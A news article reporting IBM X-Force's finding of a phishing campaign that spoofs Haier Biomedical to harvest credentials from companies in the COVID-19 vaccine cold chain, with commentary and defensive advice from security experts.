Phishing campaign threatens coronavirus vaccine supply chain

A calculated cybercriminal operation is targeting companies in the coronavirus vaccine supply chain with phishing emails that appear to be designed to steal sensitive user credentials, IBM Security X-Force said in a report released Thursday. The targeted organizations are all associated with a COVID-19 cold chain, a component of the overall supply chain that ensures the safe storage of vaccines in cold environments during storage and transportation.

SEE: Social engineering: A cheat sheet for business professionals (free PDF) (TechRepublic)

Spotted this past September, the phishing campaign deploys emails spoofing a business executive from Haier Biomedical, a legitimate member company of the COVID-19 vaccine supply chain and reportedly the world's only complete cold chain provider.

Aimed at executives at companies in the energy, manufacturing, website creation, and internet security sectors, the emails seem designed to capture the victim's credentials, possibly to gain network access and sensitive information related to the distribution of the COVID-19 vaccine.

"As we all await vaccines for COVID, it goes without saying that disruption to cold-chain supply operations would be disheartening," Stephen Banda, senior manager for security solutions at security firm Lookout, told TechRepublic. "Unfortunately, the more expansive the supply chain, the greater the third-party risk to supply-chain operations. Manufacturers rely on a web of external workers, contractors, and service partners to maintain equipment, package products, manage waste, ensure worker safety, and much more."

The phishing emails contain phony requests for quotations (RFQ) related to the Cold Chain Equipment Optimization Platform (CCEOP) program, an initiative launched in 2015 by Gavi--The Vaccine Alliance and other partners to strengthen vaccine supply chains and ensure a smooth medical response to outbreaks of infectious diseases. The email contains malicious HTML attachments that when opened prompt the user to enter their credentials to view a file.

After obtaining secure account credentials, the attackers could gain access into internal communications. Such communications can include the process and plans to distribute a COVID-19 vaccine, with details on the underlying infrastructure to be used by governments to distribute a vaccine as well as the methods used by vendors to supply it. Moving laterally through an infiltrated network could also give the criminals the ability to conduct cyber espionage and capture further confidential information for future operations.

Though the identify of the people behind this campaign is unknown, typical cybercriminals wouldn't have the time or resources to pull off such a complex operation. Based on the nature of the attack, X-Force believes the true culprit to be a nation-state. Also unknown is whether the campaign has been successful. However, given the critical role that Haier Biomedical plays in vaccine transportation, the intended victims may be more likely to respond to the phishing emails without scrutinizing their legitimacy.

"Let's first acknowledge there is no breach here that I can see," Chris Morales, head of security analytics at security firm Vectra, told TechRepublic. "It is a high alert for a targeted phishing campaign against the COVID vaccine supply chain. As the cure for COVID is essentially the most valuable thing in the world in 2020, and attackers always go for what is of value, this was a sort of an inevitable scenario."

Referencing X-Force's report, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued its own advisory alerting organizations involved in Operation Warp Speed (OWS) to review the findings.

To help protect organizations from sophisticated phishing campaigns and other attacks, X-Force offers the following recommendations:

Lookout's Banda also provided his own advice aimed at the mobile workforce.

"Cold-chain supply organizations need to adopt a heightened awareness and deeper understanding of phishing attacks," Banda said. "The first lesson is that phishing is not just happening in email on your laptop or desktop. Attackers know that supply-chain operators depend on smartphones and tablets to monitor supply-chain operations and provide key inputs. They also know that users inherently trust their smartphones and tablets and that the smaller form factor makes it more difficult to spot a phishing attack."

Also see